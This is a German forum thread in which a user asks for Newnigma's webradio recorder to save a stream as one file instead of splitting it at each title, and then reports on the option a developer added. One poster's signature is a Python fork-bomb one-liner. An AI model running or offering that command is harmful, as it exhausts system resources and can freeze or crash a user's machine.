Option für Aufnahme am Stück im Webradio

• Option für Aufnahme am Stück im Webradio

Hallo,

die Aufnahmefunktion für Webradio war für mich der Grund, vom Experimental auf Newnigma umzusteigen, doch leider kann ich die Aufnahmefunktion bei den meisten Stationen nicht nutzen. Es sollte eine Option geben, mit der man wählen kann, ob die Files wie derzeit bei jedemneuen Titel gesplittet werden sollen oder die ganze Aufnahme am Stück in ein File gespeichert werden soll. Es gibt viele Sender, die nur wechselnde Eigenwerbung als Titel senden und da macht das automatische Splitten keinen Sinn.

Wenn der Sourcecode offen wäre, würde ich es auch selber einbauen, falls kein Dev Zeit dafür hat.
    • RE: Option für Aufnahme am Stück im Webradio

Original von Traumkiste8000
      Wenn der Sourcecode offen wäre, würde ich es auch selber einbauen, falls kein Dev Zeit dafür hat.

Wäre ja nur ne Einstellungsänderung, also andere Parameterübergabe, für den streamripper, sofern dieser verwendet wird (ich hab keinen Plan, aber hört sich danach an :) ). Aber soweit ich weiß ich der Source Code für das Webradio von newnigma aber nicht public.
      4 8 15 16 23 42
    • Tja, ist eigentlich nur ne Kleinigkeit. In der .pyc sieht man die Parameterübergabe. Habe schon versucht die zu patchen, wird aber ignoriert.

Ich hoffe immernoch, dass der zuständige Dev diese Option einbaut, denn wegen Gema Auflagen gibt es eh kaum ein Webradio mehr, wo die Titelanzeige direkt beim Titelwechsel geändert wird.
    • RE: Option für Aufnahme am Stück im Webradio

Original von Traumkiste8000
      Hallo,

die Aufnahmefunktion für Webradio war für mich der Grund, vom Experimental auf Newnigma umzusteigen, doch leider kann ich die Aufnahmefunktion bei den meisten Stationen nicht nutzen. Es sollte eine Option geben, mit der man wählen kann, ob die Files wie derzeit bei jedemneuen Titel gesplittet werden sollen oder die ganze Aufnahme am Stück in ein File gespeichert werden soll. Es gibt viele Sender, die nur wechselnde Eigenwerbung als Titel senden und da macht das automatische Splitten keinen Sinn.

Ich kümmer mich darum ;)
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • @kati910
      Ich bin mir nicht sicher, ob ich die neue Version jetzt drauf habe, update DM8000 unstable gerade gemacht. Da gibt es im Webradio nun die Option "Aufnahme in einzelne Datei der Name ist der zeitstempel" Bei "Ja" wird die Aufnahme z.B. vom Dream power radio immer noch in Stückchen gesplittet. Nur der Name ist dann der Zeitstempel. Ist das die neue Version?

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Traumkiste8000 ()